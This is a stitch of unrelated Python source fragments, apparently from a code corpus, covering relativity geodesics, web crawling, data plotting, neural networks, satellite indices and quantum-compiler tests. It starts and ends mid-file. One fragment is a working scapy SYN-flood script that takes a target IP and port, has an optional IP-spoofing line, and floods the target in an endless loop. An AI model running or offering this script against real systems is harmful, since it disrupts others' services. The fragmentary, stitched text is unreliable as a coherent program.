For non-capture trajectories, ``omega = 1.0`` is recommended.
            For trajectories that either lead to a capture or a grazing
            geodesic, a decreased value of ``0.01`` or less is recommended.
Defaults to ``1.0``
suppress_warnings : bool
Whether to suppress warnings during simulation
Warnings are shown for every step, where numerical errors
exceed specified tolerance (controlled by ``rtol`` and ``atol``)
Defaults to ``False``
"""
super().__init__(
metric=metric,
metric_params=metric_params,
position=position,
momentum=momentum,
time_like=False,
return_cartesian=return_cartesian,
**kwargs,
)
class Timelike(Geodesic):
"""
Class for defining Time-like Geodesics
"""
def __init__(
self, metric, metric_params, position, momentum, return_cartesian=True, **kwargs
):
"""
Constructor
Parameters
----------
metric : str
Name of the metric. Currently, these metrics are supported:
1. Schwarzschild
2. Kerr
3. KerrNewman
metric_params : array_like
Tuple of parameters to pass to the metric
E.g., ``(a,)`` for Kerr
position : array_like
3-Position
4-Position is initialized by taking ``t = 0.0``
momentum : array_like
3-Momentum
4-Momentum is calculated automatically,
considering the value of ``time_like``
return_cartesian : bool, optional
Whether to return calculated positions in Cartesian Coordinates
            This only affects the coordinates. The momenta are dimensionless
            quantities and are returned in Spherical Polar Coordinates.
Defaults to ``True``
kwargs : dict
Keyword parameters for the Geodesic Integrator
See 'Other Parameters' below.
Other Parameters
----------------
steps : int
Number of integration steps
Defaults to ``50``
delta : float
Initial integration step-size
Defaults to ``0.5``
rtol : float
Relative Tolerance
Defaults to ``1e-2``
atol : float
Absolute Tolerance
Defaults to ``1e-2``
order : int
Integration Order
Defaults to ``2``
omega : float
Coupling between Hamiltonian Flows
Smaller values imply smaller integration error, but too
small values can make the equation of motion non-integrable.
For non-capture trajectories, ``omega = 1.0`` is recommended.
            For trajectories that either lead to a capture or a grazing
            geodesic, a decreased value of ``0.01`` or less is recommended.
Defaults to ``1.0``
suppress_warnings : bool
Whether to suppress warnings during simulation
Warnings are shown for every step, where numerical errors
exceed specified tolerance (controlled by ``rtol`` and ``atol``)
Defaults to ``False``
"""
super().__init__(
metric=metric,
metric_params=metric_params,
position=position,
momentum=momentum,
time_like=True,
return_cartesian=return_cartesian,
**kwargs,
)
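# --- Hedged usage sketch (illustrative values only, not from the original module) ---
# A time-like orbit around a Schwarzschild black hole could be set up as:
#
#     geod = Timelike(
#         metric="Schwarzschild",
#         metric_params=(0.0,),
#         position=[40.0, np.pi / 2, 0.0],   # (r, theta, phi); t = 0.0 is prepended
#         momentum=[0.0, 0.0, 3.8],          # (p_r, p_theta, p_phi); p_t is derived
#         steps=500,
#         delta=0.5,
#     )
#     step_idx, vecs = geod.trajectory       # vecs rows: (t, x, y, z, p_t, p_r, p_theta, p_phi)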
|
61190
|
from ksc.backends import common
from ksc.backends import abstract
from ksc.backends import jax
from ksc.backends import jax_input_last
|
61198
|
from linz_logger import get_log
from topo_processor.util import time_in_ms
from .get_fs import get_fs
def transfer_file(source_file: str, checksum: str, content_type, target_file: str):
start_time = time_in_ms()
with get_fs(source_file).open(source_file, "rb") as f1:
data = f1.read()
with get_fs(target_file).open(target_file, "wb", ContentType=content_type, Metadata={"hash": checksum}) as f2:
f2.write(data)
get_log().debug(
"File transferred", source_file=source_file, target_file=target_file, duration=time_in_ms() - start_time
)
|
61221
|
import json
import time
from typing import Dict
from scrapy.exceptions import NotConfigured
from scrapy.http.response.html import HtmlResponse
from scrapy_cdr import CDRItem
from dd_crawler.utils import get_domain
class RequestLogMiddleware:
def __init__(self, *, jl_logger, relevancy_threshold: float):
        # These are per-worker values, while the stats values updated in
        # dd_crawler.queue are global.
self.domains = set()
self.relevant_domains = set()
self.total_score = 0.
self.n_crawled = 0
self.jl_logger = jl_logger
self.relevancy_threshold = relevancy_threshold
@classmethod
def from_crawler(cls, crawler) -> 'RequestLogMiddleware':
log_path = crawler.settings.get('RESPONSE_LOG_FILE')
if not log_path:
raise NotConfigured('RESPONSE_LOG_FILE not defined')
jl_logger = get_jl_logger(log_path)
threshold = crawler.settings.getfloat('PAGE_RELEVANCY_THRESHOLD', 0.5)
return cls(jl_logger=jl_logger, relevancy_threshold=threshold)
def process_spider_output(self, response, result, spider):
for item in result:
if isinstance(item, CDRItem):
self.log_item(item, response)
yield item
def log_item(self, item: CDRItem, response: HtmlResponse):
self.n_crawled += 1
domain = get_domain(item['url'])
self.domains.add(domain)
metadata = item.get('metadata', {})
score = metadata.get('page_score', 0.)
if score is not None:
self.total_score += score
if score > self.relevancy_threshold:
self.relevant_domains.add(domain)
log_entry = {
'time': time.time(),
'url': response.url,
'id': metadata.get('id'),
'parent': metadata.get('parent'),
'depth': response.meta.get('depth', ''),
'priority': response.request.priority,
'score': score,
'total_score': self.total_score,
'n_crawled': self.n_crawled,
'n_domains': len(self.domains),
'n_relevant_domains': len(self.relevant_domains),
}
if metadata.get('has_login_form'):
log_entry['has_login_form'] = True
if 'autologin_active' in response.meta:
log_entry['login_success'] = response.meta['autologin_active']
self.jl_logger.write_entry(log_entry)
class JsonLinesLogger:
def __init__(self, log_path):
self._log_file = open(log_path, 'at')
def write_entry(self, log_entry: Dict):
json.dump(log_entry, self._log_file)
self._log_file.write('\n')
self._log_file.flush()
_loggers = {}
def get_jl_logger(log_path):
if log_path not in _loggers:
_loggers[log_path] = JsonLinesLogger(log_path)
return _loggers[log_path]
|
61226
|
import pandas as pd
def lookup_dates(s):
"""
This is an extremely fast approach to datetime parsing.
For large data, the same dates are often repeated. Rather than
re-parse these, we store all unique dates, parse them, and
use a lookup to convert all dates.
"""
dates_dict = {date:pd.to_datetime(date,errors='coerce') for date in s.unique()}
return s.map(dates_dict)
def end_quarter(series):
return (series - pd.tseries.offsets.DateOffset(days=1) + pd.tseries.offsets.QuarterEnd())
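# Hedged usage sketch (not part of the original module):
if __name__ == '__main__':
    s = pd.Series(['2020-01-15', '2020-01-15', '2020-05-03', 'not a date'])
    parsed = lookup_dates(s)      # repeated strings are parsed only once; bad values become NaT
    print(parsed)
    print(end_quarter(parsed))    # e.g. 2020-01-15 -> 2020-03-31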
|
61235
|
from mongoengine import Document, StringField, BooleanField, IntField, ListField, ReferenceField, EmailField, LongField
from mongoengine import NULLIFY, PULL
class User(Document):
ID = LongField(unique=True, required=True)
Username = StringField(required=True)
Password = StringField()
IsLock = BooleanField(required=True)
|
61247
|
import torch
from torch import nn
from torch.nn import functional as F
from .resnet import resnet18, resnet34
from .segmentation import SegmentationHead
from .attention import Attention
from .erfnet import ERFNet
class Normalize(nn.Module):
""" ImageNet normalization """
def __init__(self, mean, std):
super().__init__()
self.mean = nn.Parameter(torch.tensor(mean), requires_grad=False)
self.std = nn.Parameter(torch.tensor(std), requires_grad=False)
def forward(self, x):
return (x - self.mean[None,:,None,None]) / self.std[None,:,None,None]
class RGBModel(nn.Module):
def __init__(self, seg_channels, pretrained=True):
super().__init__()
self.num_channels = len(seg_channels)
self.backbone = resnet18(pretrained=pretrained)
self.normalize = Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
        self.head = None  # expected to be assigned (e.g. by a subclass) before forward() is called
def forward(self, rgb):
embd = self.backbone(self.normalize(rgb/255.))
return self.head(embd).squeeze(-1)
class RGBSegmentationModel(nn.Module):
def __init__(self, seg_channels):
super().__init__()
self.erfnet = ERFNet(len(seg_channels)+1)
self.normalize = lambda x: (x/255.-.5)*2
def forward(self, rgb):
return self.erfnet(self.normalize(rgb))
class RGBBrakePredictionModel(nn.Module):
def __init__(self, seg_channels, pretrained=True):
super().__init__()
self.conv_backbone = resnet18(pretrained=pretrained)
self.normalize = Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
self.seg_head = SegmentationHead(512, len(seg_channels)+1)
self.classifier = nn.Sequential(
nn.Linear(1024,1),
nn.Sigmoid()
)
def forward(self, rgb1, rgb2, mask=False):
x1 = self.conv_backbone(self.normalize(rgb1/255.))
x2 = self.conv_backbone(self.normalize(rgb2/255.))
h1 = x1.mean(dim=[2,3])
h2 = x2.mean(dim=[2,3])
pred_bra = self.classifier(torch.cat([h1,h2], dim=1))
if mask:
pred_sem1 = F.interpolate(self.seg_head(x1), scale_factor=4)
pred_sem2 = F.interpolate(self.seg_head(x2), scale_factor=4)
return pred_bra[:,0], pred_sem1, pred_sem2
else:
return pred_bra[:,0]
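# --- Hedged usage sketch (illustrative; assumes the local resnet18 backbone returns
# a 512-channel feature map, as the 1024-wide classifier above implies) ---
#
#     model = RGBBrakePredictionModel(seg_channels=['road', 'vehicle'], pretrained=False)
#     rgb1 = rgb2 = torch.zeros(4, 3, 224, 224)   # raw images; the model divides by 255 itself
#     brake = model(rgb1, rgb2)                   # shape (4,), values in [0, 1]
#     brake, sem1, sem2 = model(rgb1, rgb2, mask=True)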
|
61265
|
import sqlite3
import argparse
from os.path import join
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from keras.models import model_from_json
import preprocessing.config as cfg
import preprocessing.file_utils as futils
from preprocessing.data import LightDataManager
def paper_plot():
cnn_stator_id = 'ebb3'
cnn_rotor_id = '2950'
rnn_stator_id = 'f334'
rnn_rotor_id = 'c329'
plt.figure(figsize=(2*5, 2*2))
hp_reports = futils.HyperparameterSearchReport()
hp_reports.read_search(cnn_stator_id)
hp_reports.read_search(cnn_rotor_id)
hp_reports.read_search(rnn_stator_id)
hp_reports.read_search(rnn_rotor_id)
# hack: cut off first 50 iterations in RNN Stator search
tab = hp_reports.hp_searches[rnn_stator_id]
hp_reports.hp_searches[rnn_stator_id] = \
tab[tab.n_iter >= 50].reset_index(drop=True)
plt.subplot(2, 2, 1)
hp_reports.plot_convergence(rnn_stator_id, 'Stator (RNN)')
plt.ylabel(r'MSE in $\mathrm{K^2}$ (RNN)')
plt.xlabel('')
plt.title('')
plt.subplot(2, 2, 2)
hp_reports.plot_convergence(rnn_rotor_id, 'Rotor (RNN)')
plt.xlabel('')
plt.ylabel('')
plt.legend().remove()
plt.title('')
plt.subplot(2, 2, 3)
hp_reports.plot_convergence(cnn_stator_id, 'Stator (CNN)')
plt.legend().remove()
plt.title('')
plt.xlabel('Stator search iteration')
plt.ylabel(r'MSE in $\mathrm{K^2}$ (CNN)')
plt.subplot(2, 2, 4)
hp_reports.plot_convergence(cnn_rotor_id, 'Rotor (CNN)')
plt.xlabel('Rotor search iteration')
plt.ylabel('')
plt.legend().remove()
plt.title('')
# find best performing models
hp_reports.plot_best_models_performance(rnn_rotor_id, rnn_stator_id)
hp_reports.plot_best_models_performance(cnn_rotor_id, cnn_stator_id)
plt.show()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Visualize performance of the '
'given model uid.')
parser.add_argument('-s', '--stator_id', required=False,
help='The 4-digit id in hex of the experiment on '
'stator temperatures')
parser.add_argument('-r', '--rotor_id', required=False,
help='The 4-digit id in hex of the experiment on '
'rotor temperatures')
parser.add_argument('-p', '--paper_plot', required=False,
action='store_true',
help='Flag for ignoring given IDs and instead plot '
'four predefined searches for the IEMDC Paper')
args = parser.parse_args()
sns.set_context('paper')
sns.set_style('whitegrid')
if args.paper_plot:
paper_plot()
else:
assert args.rotor_id is not None and args.stator_id is not None
hp_reports = futils.HyperparameterSearchReport()
hp_reports.read_search(args.rotor_id)
hp_reports.read_search(args.stator_id)
try:
print('Plot stator temperature convergence ..')
plt.figure(figsize=(5, 2.4))
hp_reports.plot_convergence(args.stator_id)
print('Plot rotor temperature convergence ..')
plt.figure(figsize=(5, 2.4))
hp_reports.plot_convergence(args.rotor_id)
plt.show()
        except Exception as exc:
            print('plot failed:', exc)
|
61273
|
import FWCore.ParameterSet.Config as cms
# BTagPerformanceAnalyzer configuration
from Validation.RecoB.bTagAnalysis_cfi import *
bTagValidationHarvest = bTagHarvestMC.clone()
from DQMOffline.RecoB.bTagAnalysisData_cfi import *
bTagValidationHarvestData = bTagHarvest.clone()
|
61294
|
from scapy.all import *
import argparse
parser = argparse.ArgumentParser(description="Simple SYN Flood Script")
parser.add_argument("target_ip", help="Target IP address (e.g router's IP)")
parser.add_argument("-p", "--port", help="Destination port (the port of the target's machine service, \
e.g 80 for HTTP, 22 for SSH and so on).")
# parse arguments from the command line
args = parser.parse_args()
# target IP address (should be a testing router/firewall)
target_ip = args.target_ip
# the target port you want to flood
target_port = args.port
# forge IP packet with target ip as the destination IP address
ip = IP(dst=target_ip)
# or if you want to perform IP Spoofing (will work as well)
# ip = IP(src=RandIP("192.168.1.1/24"), dst=target_ip)
# forge a TCP SYN packet with a random source port
# and the target port as the destination port
tcp = TCP(sport=RandShort(), dport=target_port, flags="S")
# add some flooding data (1KB in this case, don't increase it too much,
# otherwise, it won't work.)
raw = Raw(b"X"*1024)
# stack up the layers
p = ip / tcp / raw
# send the constructed packet in a loop until CTRL+C is detected
send(p, loop=1, verbose=0)
|
61340
|
import ee
from zipfile import ZipFile
from io import BytesIO
import os
import requests
class S2indexes:
def __init__(self, area, dir, date_from, date_end, scope):
"""
        given an area defined by a geoJSON, it returns rasters of
        remote sensing indexes for the specified date range, at a granularity defined by the scope parameter
        Args:
            area: geoJSON, use squaretogeojson to generate
            dir: directory where to save the rasters
            date_from, date_end: date range of the imagery to use
scope (str): country or urban?
"""
self.area = area
self.dir = dir
self.date_from = date_from
self.date_end = date_end
self.scope = scope
self.files = None
def download(self):
print('INFO: downloading rms indexes for area of interest ...')
if os.path.exists(self.dir + str(self.area["coordinates"]) + "NDVI_max.tif") \
and os.path.exists(self.dir + str(self.area["coordinates"]) + "NDBI_max.tif") \
and os.path.exists(self.dir + str(self.area["coordinates"]) + "NDWI_max.tif"):
self.files = [str(self.area["coordinates"]) + "NDVI_max.tif", str(self.area["coordinates"]) + "NDBI_max.tif", str(self.area["coordinates"]) + "NDWI_max.tif"]
print('INFO: NDs data for {} already downloaded'.format(self.area["coordinates"]))
else:
ee.Initialize()
GREEN = 'B3'
RED = 'B4'
NIR = 'B8'
SWIR = 'B11'
sentinel = ee.ImageCollection('COPERNICUS/S2') \
.filterDate(ee.Date(self.date_from), ee.Date(self.date_end)) \
.filterBounds(self.area) \
.select([GREEN, RED, NIR, SWIR]) \
.filterMetadata('CLOUDY_PIXEL_PERCENTAGE', 'less_than', 70)
def addIndices(image):
ndvi = image.normalizedDifference([NIR, RED])
ndbi = image.normalizedDifference([SWIR, NIR])
ndwi = image.normalizedDifference([GREEN, NIR])
return image.addBands(ndvi.rename('NDVI')) \
.addBands(ndbi.rename('NDBI')) \
.addBands(ndwi.rename('NDWI'))
img = sentinel.map(addIndices).select(['NDVI', 'NDBI', 'NDWI']).reduce("max").clip(self.area)
# download
if self.scope == 'urban':
print('INFO: NDs scope > urban')
scale = 100
else:
print('INFO: NDs scope -> country')
scale = 5000
for b in ['NDVI_max', 'NDBI_max', 'NDWI_max']:
url = img.select(b).getDownloadUrl({'crs': 'EPSG:4326', 'region': self.area, 'scale': scale})
r = requests.get(url)
z = ZipFile(BytesIO(r.content))
z.extract(z.namelist()[1], self.dir)
os.rename(self.dir + z.namelist()[1], self.dir + str(self.area["coordinates"]) + b+'.tif')
self.files = [str(self.area["coordinates"]) + "NDVI_max.tif", str(self.area["coordinates"]) + "NDBI_max.tif",
str(self.area["coordinates"]) + "NDWI_max.tif"]
def rms_values(self, longitudes, latitudes):
"""
Given a dataset with latitude and longitude columns, it returns the nightlight value at each point.
Args:
longitudes: list of longitudes
latitudes: list of latitudes
Returns:
Series
"""
import rasterio
try:
NDVI = rasterio.open(self.dir + self.files[0])
NDBI = rasterio.open(self.dir + self.files[1])
NDWI = rasterio.open(self.dir + self.files[2])
except MemoryError:
print('Remote sensing indexes rasters too big!')
raise
veg, build, wat = [], [], []
for lon, lat in zip(longitudes, latitudes):
i, j = NDVI.index(lon, lat)
veg.append(NDVI.read(1)[i, j])
build.append(NDBI.read(1)[i, j])
wat.append(NDWI.read(1)[i, j])
return veg, build, wat
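# --- Hedged usage sketch (requires authenticated Earth Engine access; names and
# values are illustrative only) ---
#
#     s2 = S2indexes(area=geojson_area, dir='data/', date_from='2019-01-01',
#                    date_end='2019-12-31', scope='urban')
#     s2.download()                                   # writes NDVI/NDBI/NDWI GeoTIFFs to dir
#     veg, build, wat = s2.rms_values(df['longitude'], df['latitude'])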
|
61346
|
class Solution(object):
def productExceptSelf(self, nums):
"""
:type nums: List[int]
:rtype: List[int]
"""
|
61349
|
import pandas as pd
import numpy as np
from numpy import corrcoef
import matplotlib.pyplot as plt
from sklearn.feature_selection import chi2
from sklearn.feature_selection import f_classif
from math import *
plt.style.use('ggplot')
fig = plt.figure()
COUNTER = 1
# Return the category dictionary and the categorical/continuous column lists for every column in the dataframe.
# The categories are assigned as "target(type)_feature(type)"
def get_category(df,target_name,categorical_name,columns_name):
cat_dict = {}
fin_cat_dict = {}
catg_catg = []
cont_cont = []
catg_cont = []
cont_catg = []
for col in columns_name:
if len(df[col].unique())<=2:
cat_dict[col] = "categorical"
elif col in categorical_name:
cat_dict[col] = "categorical"
else:
cat_dict[col] = "continous"
for col in cat_dict:
if cat_dict[col]=="categorical" and cat_dict[target_name]=="categorical":
fin_cat_dict[col] = "catg_catg"
catg_catg.append(col)
elif cat_dict[col]=="continous" and cat_dict[target_name]=="continous":
fin_cat_dict[col] = "cont_cont"
cont_cont.append(col)
elif cat_dict[col]=="continous" and cat_dict[target_name]=="categorical":
fin_cat_dict[col] = "catg_cont"
catg_cont.append(col)
else:
fin_cat_dict[col] = "cont_catg"
cont_catg.append(col)
return fin_cat_dict,catg_catg,cont_cont,catg_cont,cont_catg
# Return True if all names in categorical_name are present in the original dataframe columns.
def is_present(columns_name,categorical_name):
ls = [i for i in categorical_name if i not in columns_name]
if len(ls)==0:
return True
else:
        raise ValueError(str(ls)+" is not present as a column in the data, please check the name")
# Removes columns containing string (non-numeric) data from lst and returns the remaining columns.
def clean_str_list(df,lst):
rem=[]
for i in lst:
res = any(isinstance(n,str) for n in df[i])
if res == True:
rem.append(i)
for j in rem:
lst.remove(j)
return lst
# Returns the Pearson correlation coefficient matrix for two continuous data columns.
def pearson_correlation_cont_cont(x,y):
return corrcoef(x,y)
# Bivariate analysis between two continuous variables. Plots scatter plots and shows the correlation coefficient for the data.
def bivariate_analysis_cont_cont(cont_cont_list,df,target_name,sub_len,COUNTER,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE):
clean_cont_cont_list = clean_str_list(df,cont_cont_list)
if len(clean_str_list(df,[target_name])) == 0 and len(cont_cont_list)>0:
raise ValueError("You seem to have a target variable with string values.")
clean_df = df.dropna()
for col in clean_cont_cont_list:
summary = clean_df[col].describe()
count = summary[0]
mean = summary[1]
std = summary[2]
plt.subplot(PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE,COUNTER)
plt.title("mean "+str(np.float32(mean))+" std "+str(np.float32(std)),fontsize=10)
x = clean_df[col]
y = np.float32(clean_df[target_name])
corr = pearson_correlation_cont_cont(x,y)
plt.xlabel(col+"\n count "+str(count)+"\n Corr: "+str(np.float32(corr[0][1])), fontsize=10)
plt.ylabel(target_name, fontsize=10)
plt.scatter(x,y)
print (col+" vs "+target_name+" plotted....")
COUNTER +=1
return plt,COUNTER
# The chi-squared test is used to assess the association between two categorical variables.
# Lower p-values are significant; they should be < 0.05.
# chi value = X^2 = sum[(observed - expected)^2 / expected]
# The distribution of the statistic X^2 is chi-square with (r-1)(c-1) degrees of freedom, where r is the number of rows in the two-way table and c is the number of columns; df denotes the degrees of freedom.
# p-value = P(chi-square with df degrees of freedom >= X^2)
def evaluate_chi(x,y):
chi,p_val = chi2(x,y)
return chi,p_val
def bivariate_analysis_catg_catg(catg_catg_list,df,target_name,sub_len,COUNTER,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE,bin_size="auto"):
clean_catg_catg_list = clean_str_list(df,catg_catg_list)
clean_df = df.dropna()
target_classes =df[target_name].unique()
label = [str(i) for i in target_classes]
c = 0
for col in clean_catg_catg_list:
summary = clean_df[col].describe()
binwidth = 0.7
if bin_size == 'auto':
bins_size =np.arange(min(clean_df[col].tolist()), max(clean_df[col].tolist()) + binwidth, binwidth)
else:
bins_size = bin_size
count = summary[0]
mean = summary[1]
std = summary[2]
plt.subplot(PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE,COUNTER)
plt.title("mean "+str(np.float32(mean))+" std "+str(np.float32(std)),fontsize=10)
x = [np.array(clean_df[clean_df[target_name]==i][col]) for i in target_classes]
y = clean_df[target_name]
chi,p_val = evaluate_chi(np.array(clean_df[col]).reshape(-1,1),y)
plt.xlabel(col+"\n chi: "+str(np.float32(chi[0]))+" / p_val: "+str(p_val[0]), fontsize=10)
plt.ylabel("Frequency", fontsize=10)
plt.hist(x,bins=bins_size,stacked=True,label = label)
plt.legend(prop={'size': 10})
print (col+" vs "+target_name+" plotted....")
COUNTER +=1
c+=1
return plt,COUNTER
# Analysis of variance (ANOVA) is a collection of statistical models used to analyze the differences among group means and their associated procedures (such as "variation" among and between groups)
# In its simplest form, ANOVA provides a statistical test of whether or not the means of several groups are equal, and therefore generalizes the t-test to more than two groups. ANOVAs are useful for comparing (testing) three or more means (groups or variables) for statistical significance.
# A one-way ANOVA is used to compare the means of more than two independent groups. A one-way ANOVA comparing just two groups will give you the same results as the independent t test.
def evaluate_anova(x,y):
F_value,pvalue = f_classif(x,y)
return F_value,pvalue
# In descriptive statistics, a box plot or boxplot is a convenient way of graphically depicting groups of numerical data through their quartiles. Box plots may also have lines extending vertically from the boxes (whiskers) indicating variability outside the upper and lower quartiles, hence the terms box-and-whisker plot and box-and-whisker diagram.
# Quartile: In descriptive statistics, the quartiles of a ranked set of data values are the three points that divide the data set into four equal groups, each group comprising a quarter of the data
def bivariate_analysis_cont_catg(cont_catg_list,df,target_name,sub_len,COUNTER,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE):
clean_cont_catg_list = clean_str_list(df,cont_catg_list)
if len(clean_str_list(df,[target_name])) == 0 and len(cont_catg_list)>0:
raise ValueError("You seem to have a target variable with string values.")
clean_df = df.dropna()
for col in clean_cont_catg_list:
col_classes =clean_df[col].unique()
summary = clean_df[col].describe()
count = summary[0]
mean = summary[1]
std = summary[2]
plt.subplot(PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE,COUNTER)
plt.title("mean "+str(np.float32(mean))+" std "+str(np.float32(std)),fontsize=10)
x = [np.array(clean_df[clean_df[col]==i][target_name]) for i in col_classes]
y = np.float32(clean_df[target_name])
f_value,p_val = evaluate_anova(np.array(clean_df[col]).reshape(-1,1),y)
plt.xlabel(col+"\n f_value: "+str(np.float32(f_value[0]))+" / p_val: "+str(p_val[0]), fontsize=10)
plt.ylabel(target_name, fontsize=10)
plt.boxplot(x)
print (col+" vs "+target_name+" plotted....")
COUNTER +=1
return plt,COUNTER
# This function is for the bivariate analysis between a categorical target and a continuous variable. Plots box plots.
def bivariate_analysis_catg_cont(catg_cont_list,df,target_name,sub_len,COUNTER,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE):
# No need to remove string varible as they are handled by chi2 function of sklearn.
# clean_catg_cont_list = clean_str_list(df,catg_cont_list)
clean_catg_cont_list = catg_cont_list
clean_df = df.dropna()
for col in clean_catg_cont_list:
col_classes =df[target_name].unique()
summary = clean_df[col].describe()
count = summary[0]
mean = summary[1]
std = summary[2]
plt.subplot(PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE,COUNTER)
plt.title("mean "+str(np.float32(mean))+" std "+str(np.float32(std)),fontsize=10)
x = [np.array(clean_df[clean_df[target_name]==i][col]) for i in col_classes]
y = clean_df[target_name]
f_value,p_val = evaluate_anova(np.array(clean_df[col]).reshape(-1,1),y)
plt.xlabel(target_name+"\n f_value: "+str(np.float32(f_value[0]))+" / p_val: "+str(p_val[0]), fontsize=10)
plt.ylabel(col, fontsize=10)
plt.boxplot(x)
print (col+" vs "+target_name+" plotted....")
COUNTER +=1
return plt,COUNTER
#returns the total number of subplots to be made.
def total_subplots(df,lst):
clean_df = df.dropna()
total = [len(clean_str_list(clean_df,i)) for i in lst]
return sum(total)
# Returns a new categorical list after removing columns that appear in both the drop and categorical_name lists.
def remove_drop_from_catglist(drop,categorical_name):
for col in drop:
if col in categorical_name:
categorical_name.remove(col)
return categorical_name
def plot(data_input,target_name="",categorical_name=[],drop=[],PLOT_COLUMNS_SIZE = 4,bin_size="auto",wspace=0.5,hspace=0.8):
"""
    This is the main function to perform bivariate analysis between the target variable and the input features.
Parameters
-----------
data_input : Dataframe
This is the input Dataframe with all data.
target_name : String
The name of the target column.
categorical_name : list
        Names of all categorical variable columns with more than 2 classes, to distinguish them from the continuous variables.
drop : list
Names of columns to be dropped.
    PLOT_COLUMNS_SIZE : int
        Number of plot columns (plots per row) in the display window. The number of rows is adjusted accordingly.
    bin_size : int ;default="auto"
        Number of bins for the histogram displayed in the categorical vs categorical category.
    wspace : float ;default = 0.5
        Horizontal padding between subplots on the display window.
    hspace : float ;default = 0.8
        Vertical padding between subplots on the display window.
-----------
"""
if type(data_input).__name__ == "DataFrame" :
# Column names
columns_name = data_input.columns.values
#To drop user specified columns.
if is_present(columns_name,drop):
data_input = data_input.drop(drop,axis=1)
columns_name = data_input.columns.values
categorical_name = remove_drop_from_catglist(drop,categorical_name)
else:
raise ValueError("Couldn't find it in the input Dataframe!")
if target_name == "":
raise ValueError("Please mention a target variable")
        # Check if the categorical_name columns are present in the original dataframe columns.
categorical_is_present = is_present(columns_name,categorical_name)
target_is_present = is_present(columns_name,[target_name])
if categorical_is_present:
fin_cat_dict,catg_catg_list,cont_cont_list,catg_cont_list,cont_catg_list = get_category(data_input,target_name,categorical_name,columns_name)
#Subplot(Total number of graphs)
total = total_subplots(data_input,[cont_cont_list,catg_catg_list,catg_cont_list,cont_catg_list])
if total < PLOT_COLUMNS_SIZE:
total = PLOT_COLUMNS_SIZE
PLOT_ROW_SIZE = ceil(float(total)/PLOT_COLUMNS_SIZE)
#Call various functions
plot,count = bivariate_analysis_cont_cont(cont_cont_list,data_input,target_name,total,COUNTER,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE)
plot,count = bivariate_analysis_catg_catg(catg_catg_list,data_input,target_name,total,count,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE,bin_size=bin_size)
plot,count = bivariate_analysis_cont_catg(cont_catg_list,data_input,target_name,total,count,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE)
plot,count = bivariate_analysis_catg_cont(catg_cont_list,data_input,target_name,total,count,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE)
fig.subplots_adjust(bottom=0.08,left = 0.05,right=0.97,top=0.93,wspace = wspace,hspace = hspace)
plot.show()
else:
raise ValueError("Make sure input data is a Dataframe.")
|
61351
|
from qsearch import Project, solvers, unitaries, utils, multistart_solvers, parallelizers, compiler, options
import scipy as sp
import os
try:
from qsrs import BFGS_Jac_SolverNative, LeastSquares_Jac_SolverNative
except ImportError:
BFGS_Jac_SolverNative = None
LeastSquares_Jac_SolverNative = None
import pytest
import tempfile
import sys
qft3 = unitaries.qft(8)
def test_cobyla(project):
project.add_compilation('qft2', unitaries.qft(4))
project['solver'] = solvers.COBYLA_Solver()
project.run()
def test_bfgs_jac(project):
project.add_compilation('qft3', qft3)
project['solver'] = solvers.BFGS_Jac_Solver()
project.run()
def test_least_squares_jac(project):
project.add_compilation('qft3', qft3)
project['solver'] = solvers.LeastSquares_Jac_Solver()
project['error_residuals'] = utils.matrix_residuals
project['error_residuals_jac'] = utils.matrix_residuals_jac
project.run()
@pytest.mark.skipif(sys.platform == 'win32', reason="This test currently hangs due to the nested parallel executor")
def test_multistart_least_squares(project):
project.add_compilation('qft3', qft3)
project['solver'] = multistart_solvers.MultiStart_Solver(2)
project['inner_solver'] = solvers.LeastSquares_Jac_Solver()
project['parallelizer'] = parallelizers.ProcessPoolParallelizer
project['error_residuals'] = utils.matrix_residuals
project['error_residuals_jac'] = utils.matrix_residuals_jac
project.run()
@pytest.mark.skipif(sys.platform == 'win32', reason="This test currently hangs due to the nested parallel executor")
def test_multistart_bfgs(project):
project.add_compilation('qft3', qft3)
project['solver'] = multistart_solvers.MultiStart_Solver(2)
project['inner_solver'] = solvers.BFGS_Jac_Solver()
project['parallelizer'] = parallelizers.ProcessPoolParallelizer
project.run()
def compile(U, solver):
with tempfile.TemporaryDirectory() as dir:
opts = options.Options()
opts.target = U
opts.error_func = utils.matrix_distance_squared
opts.error_jac = utils.matrix_distance_squared_jac
opts.solver = solver
opts.log_file = os.path.join(dir, 'test.log')
comp = compiler.SearchCompiler()
res = comp.compile(opts)
return res
@pytest.mark.skipif(BFGS_Jac_SolverNative is None, reason="The rustopt feature has not been enabled")
def test_rust_solver_qft3():
U = unitaries.qft(8)
res = compile(U, BFGS_Jac_SolverNative())
circ = res['structure']
v = res['parameters']
assert utils.matrix_distance_squared(U, circ.matrix(v)) < 1e-10
@pytest.mark.skipif(LeastSquares_Jac_SolverNative is None, reason="The rustopt feature has not been enabled")
def test_rust_solver_qft3_leastsquares():
U = unitaries.qft(8)
res = compile(U, LeastSquares_Jac_SolverNative())
circ = res['structure']
v = res['parameters']
assert utils.matrix_distance_squared(U, circ.matrix(v)) < 1e-10
|
61356
|
import os
import numpy as np
def save_samples_truncted_prob(fname, points, prob):
'''
Save the visualization of sampling to a ply file.
Red points represent positive predictions.
Green points represent negative predictions.
Parameters
fname: File name to save
points: [N, 3] array of points
prob: [1, N] array of predictions in the range [0~1]
Return:
None
'''
prob = prob.transpose(0, 1).detach().numpy()
r = (prob > 0.5).reshape([-1, 1]) * 255
g = (prob < 0.5).reshape([-1, 1]) * 255
b = np.zeros(r.shape)
to_save = np.concatenate([points, r, g, b,prob], axis=-1)
return np.savetxt(fname,
to_save,
fmt='%.6f %.6f %.6f %d %d %d %.6f',
comments='',
header=(
